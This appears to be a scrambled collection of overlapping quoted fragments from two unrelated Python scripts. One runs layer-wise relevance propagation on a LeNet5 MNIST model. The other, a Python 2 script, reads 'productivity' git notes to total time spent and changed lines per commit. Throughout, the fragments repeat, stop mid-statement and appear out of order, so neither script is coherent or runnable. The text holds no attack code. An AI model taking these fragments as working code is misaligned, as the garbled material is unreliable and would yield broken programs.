model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() #", "= model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop", "parameters (stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5')", "drop softnax output layer for analysis Rs = [] for inp in X_test:", "+ str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10), out_data)", "'LeNet5', 8, #rn 
selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras", "+ '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row)", "lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test, Y_test", "(stored in JSON file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') #", "rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = [] for j", "#out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row", "json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file) file_content", "X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn", "Y_test = filter_val_set(selected_class, X_test, Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class,", "= read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer", "# plt.clf() # plt.plot(range(10), out_data) # plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i", "selected_class = 0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28,", "utils import get_layer_outs_new from utils import filter_val_set from utils import load_layerwise_relevances from lrp_toolbox.model_io", "= 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in", "img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test) 
relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d'", "Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test,", "+ ',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() #", "mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3)", "Keras model parameters (stored in JSON file) file_content = json_file.read() json_file.close() model =", "import load_model, model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils" ]
[ "os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir,", "in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time =", "= pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list:", "for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() ==", "{u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] +", "commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\",", "+ time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print", "show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit", "as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory.", "parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\")", "parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. 
Not a git repo.\"", "pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log", "in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty':", "[] for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog])", "python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import", "hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha)", "import re import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser()", "or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1", "if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git repo.\" %", "import parse_sublogs, build_graph import os.path import subprocess import sys import json import argparse", "len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in", "= git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir,", "diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for", "commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")):", "a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits =", "commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity", 
"argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args =", "print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = []", "not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\":", "git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits:", "else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent']", "= report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category:", "parse_sublogs, build_graph import os.path import subprocess import sys import json import argparse from", "contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print", "'user_responses' in report: continue if len(report) == 0: continue user_responses = report['user_responses'] if", "Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits", "#pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time)", "+ time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed =", "in log_list: report = log[1]['log'] if not 'user_responses' in 
report: continue if len(report)", "\"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = []", "#!/usr/bin/env python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path", "if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log)", "\"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log", "if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() ==", "pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list: report", "continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring'", "binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff',", "or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": continue if", "report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] =", "Repo import re import pprint import git import matplotlib import binascii parser =", "subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in", "pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo", "--ref refs/notes/productivity show # git notes --ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = []", "refs/notes/productivity show # git notes --ref 
refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for", "git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\"))", "subprocess import sys import json import argparse from git import Repo import re", "print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1)", "0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent']", "0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent'])", "commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0", "== \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1 total_time_per_commit =", "from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import json", "import sys import json import argparse from git import Repo import re import", "from git import Repo import re import pprint import git import matplotlib import", "productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find", "1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if", "= report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = 
report['NASA-TLX']", "PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs:", "= subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line", "print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc =", "[] for log in log_list: report = log[1]['log'] if not 'user_responses' in report:", "(line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": continue", "os.path import subprocess import sys import json import argparse from git import Repo", "matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity", "Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show #", "total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\",", "commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or", "= list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes", "cleansing import parse_sublogs, build_graph import os.path import subprocess import sys import json import", "import Repo import re import pprint import git import matplotlib import binascii parser", "log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import", "repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) 
#git notes --ref refs/notes/productivity", "log_list: report = log[1]['log'] if not 'user_responses' in report: continue if len(report) ==", "git import Repo import re import pprint import git import matplotlib import binascii", "== 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories:", "--ref refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha,", "\"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\"", "sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit", "+ time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0]))", "if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue", "\".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not", "[] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\",", "pass log_list = [] for hexsha, log in logs: try: for sublog in", "the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot", "= Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show", "try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", 
\"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass", "'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\")", "line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue", "report: continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) ==", "lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha,", "try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp =", "subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list =", "test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import", "category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent']", "%s directory. 
Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo =", "time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff =", "import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess import sys", "sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes", "total_time_per_commit = [] for log in log_list: report = log[1]['log'] if not 'user_responses'", "import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the", "from test_json import test_json from cleansing import parse_sublogs, build_graph import os.path import subprocess", "<gh_stars>1-10 #!/usr/bin/env python2 from test_json import test_json from cleansing import parse_sublogs, build_graph import", "\".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for hexsha,", "\"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc += 1 total_time_per_commit = sloc", "#pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in log_list: report =", "time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0}", "logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s", "break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] +", "+ time_categories['optimising']['time_spent']) 
total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff", "= [] for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha,", "git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"),", "not 'user_responses' in report: continue if len(report) == 0: continue user_responses = report['user_responses']", "continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx", "= parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a git", "time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in", "import json import argparse from git import Repo import re import pprint import", "u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] +", "total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit", "time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] +", "for log in log_list: report = log[1]['log'] if not 'user_responses' in report: continue", "sloc = 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or 
line.startswith(\"+\")): continue", "import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs", "category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0,", "time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed", "= list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git notes --ref refs/notes/productivity show", "directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir)", "sys import json import argparse from git import Repo import re import pprint", "eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir,", "0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip()", "in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or", "logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp", "== \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc", "= log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0: continue", "import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The", "logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", 
os.path.join(args.repo_dir, \".git\"),", "argparse from git import Repo import re import pprint import git import matplotlib", "help=\"The repo that contains the productivity logs as notes\") args = parser.parse_args() if(not", "0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc", "= 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha])", "import argparse from git import Repo import re import pprint import git import", "[] total_time_per_commit = [] for log in log_list: report = log[1]['log'] if not", "if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category", "find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo", "\"show\", commit.hexsha])]) except: pass log_list = [] for hexsha, log in logs: try:", "= 0 for line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if", "= report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring']", "if not 'user_responses' in report: continue if len(report) == 0: continue user_responses =", "\"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'): continue sloc +=", "show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\",", "report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for category in time_categories: if 'refectoring' in category: break", "line.strip() == \"-\": continue if line.startswith('+++') or 
line.startswith('---'): continue sloc += 1 total_time_per_commit", "re import pprint import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\",", "in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])])", "time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff", "os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except: pass log_list = [] for", "that contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))):", "report['user_responses'] if len(user_responses) == 1: continue time_categories = report['user_responses']['time_categories'] #nasa_tlx = report['NASA-TLX'] for", "import subprocess import sys import json import argparse from git import Repo import", "import git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that", "for hexsha, log in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except:", "for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4)", "== 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories =", "for category in time_categories: if 'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent':", "= (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent'] + 
time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit =", "diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip()", "continue if len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1:", "'refectoring' in category: break else: time_categories['refactoring'] = {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time", "pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for log in", "args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir, \".git\"))): print \"Cannot find %s directory. Not a", "time_categories['refactoring']['time_spent'] + time_categories['debugging']['time_spent'] + time_categories['optimising']['time_spent']) total_time_per_commit.append(total_time) commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0", "json import argparse from git import Repo import re import pprint import git", "git import matplotlib import binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains", "parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit =", "binascii parser = argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as", "log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = []", "refs/notes/productivity show eaa1b0f4a7ee65ab33d0ec0e28f6fdc04fd8fbe2 logs = [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\",", "lines_per_commit = [] total_time_per_commit = [] for log in log_list: report = log[1]['log']", "= 
argparse.ArgumentParser() parser.add_argument(\"repo_dir\", help=\"The repo that contains the productivity logs as notes\") args", "report = log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0:", "= {u'time_spent': 0.0, u'difficulty': 0} #pp.pprint(log) total_time = (time_categories['planning']['time_spent'] + time_categories['coding']['time_spent'] + time_categories['refactoring']['time_spent']", "os.path.join(args.repo_dir, \".git\") sys.exit(1) PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes)", "\"--git-dir\", os.path.join(args.repo_dir, \".git\"), 'diff', commit.hexsha, commit.parents[0].hexsha]) sloc = 0 for line in diff.split('\\n'):", "= [] for log in log_list: report = log[1]['log'] if not 'user_responses' in", "except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit =", "import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list) lines_per_commit = [] total_time_per_commit = [] for", "log[1]['log'] if not 'user_responses' in report: continue if len(report) == 0: continue user_responses", "for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE,", "#commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref refs/notes/productivity show # git", "line in diff.split('\\n'): if not (line.startswith(\"-\") or line.startswith(\"+\")): continue if line.strip() == \"+\"", "PRODUCTIVITY_NOTES_NAMESPACE=\"refs/notes/productivity\" repo = Repo(args.repo_dir) #commits = list(repo.iter_commits(\"sharrell\")) commits = list(build_graph(repo).nodes) #git notes --ref", "line.startswith(\"+\")): continue if line.strip() == \"+\" or line.strip() == \"-\": 
continue if line.startswith('+++')", "sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) #pp.pprint(log_list)", "\".git\"))): print \"Cannot find %s directory. Not a git repo.\" % os.path.join(args.repo_dir, \".git\")", "repo that contains the productivity logs as notes\") args = parser.parse_args() if(not os.path.isdir(os.path.join(args.repo_dir,", "commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\", \"--ref\", PRODUCTIVITY_NOTES_NAMESPACE, \"show\", commit.hexsha])]) except:", "= [] for commit in commits: try: logs.append([commit.hexsha, subprocess.check_output([\"git\", \"--git-dir\", os.path.join(args.repo_dir, \".git\"), \"notes\",", "log in log_list: report = log[1]['log'] if not 'user_responses' in report: continue if", "len(report) == 0: continue user_responses = report['user_responses'] if len(user_responses) == 1: continue time_categories", "continue if line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or", "if line.strip() == \"+\" or line.strip() == \"-\": continue if line.startswith('+++') or line.startswith('---'):", "in logs: try: for sublog in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint", "commit = git.Commit(repo, binascii.unhexlify(log[0])) lines_changed = 0 print commit.diff(commit.parents[0])[0].diff diff = subprocess.check_output([\"git\", \"--git-dir\",", "in parse_sublogs(log): log_list.append([hexsha, sublog]) except: print(hexsha) import pprint pp = pprint.PrettyPrinter(indent=4) 